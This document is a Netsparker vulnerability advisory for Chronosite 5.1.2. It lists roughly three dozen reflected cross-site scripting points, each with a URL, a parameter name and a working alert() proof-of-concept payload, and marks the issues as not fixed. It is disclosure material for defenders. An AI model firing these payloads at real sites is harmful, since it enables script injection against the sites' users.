Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected XSS Vulnerabilities in Chronosite
Affected Software: Chronosite
Affected Versions: 5.1.2
Vendor Homepage: http://www.chronosite.org/
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Netsparker Advisory Reference: NS-17-027

Technical Details
--------------------

Proof of Concept URLs for XSS vulnerabilities in Chronosite 5.1.2:

Url /chronosite_512/annuaires/faq_01.php
Parameter Name marque
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0041A3)</scRipt>

Url /chronosite_512/archives.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002E78)</scRipt>

Url /chronosite_512/archives.php
Parameter Name theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F36)</scRipt>

Url /chronosite_512/archives.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/archives.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002F38)</scRipt>

Url /chronosite_512/archives.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0031CE)</scRipt>

Url /chronosite_512/forum.php
Parameter Name response_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x002070)</scRipt>

Url /chronosite_512/forum.php
Parameter Name ajoute_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206C)</scRipt>

Url /chronosite_512/forum.php
Parameter Name num_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001EF2)</scRipt>

Url /chronosite_512/forum.php
Parameter Name cherche
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url /chronosite_512/forum.php
Parameter Name response
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00206E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name publique
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218E)</scRipt>

Url /chronosite_512/forum.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00218C)</scRipt>

Url /chronosite_512/index.php
Parameter Name lien_interne
Parameter Type POST
Attack Pattern /"onload="alert(9)" x

Url /chronosite_512/index.php
Parameter Name num_ero
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001929)</scRipt>

Url /chronosite_512/index.php
Parameter Name affiche_infos
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019F1)</scRipt>

Url /chronosite_512/index.php
Parameter Name actif
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x001989)</scRipt>

Url /chronosite_512/index.php
Parameter Name ident
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EB)</scRipt>

Url /chronosite_512/index.php
Parameter Name decale
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00198B)</scRipt>

Url /chronosite_512/index.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0019EF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name ajoute_un_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025D1)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name kestion
Parameter Type POST
Attack Pattern </title></textarea></noscRipt><scRipt>alert(9)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name marque_theme
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0025CF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name annule
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00274B)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name cherche
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024AF)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name email
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B3)</scRipt>

Url /chronosite_512/livredor.php
Parameter Name pseudo
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0024B1)</scRipt>

Url /chronosite_512/stats/
Parameter Name ana
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0039E7)</scRipt>

Url /chronosite_512/stats/
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0038CB)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name tri_moi
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005173)</scRipt>

Url /chronosite_512/stats/admin.php?ana=Visiteurs&ope=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x004D65)%3C/scRipt%3E&tri_ann=
Parameter Name ope
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004D65)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name sit
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x004F69)</scRipt>

Url /chronosite_512/stats/admin.php
Parameter Name ope
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x005231)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x003BBF)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BBF)</scRipt>

Url /chronosite_512/stats/index.php?ana=3
Parameter Name value
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x003BC1)</scRipt>

Url /chronosite_512/stats/index.php?ana=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x00386C)%3C/scRipt%3E
Parameter Name ana
Parameter Type GET
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00386C)</scRipt>

For more information on cross-site scripting vulnerabilities, read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
02 Feb 2017 - Issue reported.
12 Jun 2017 - Advisory released.

Solution
--------------------
-

Credits & Authors
--------------------
These issues were discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. The Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions: Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.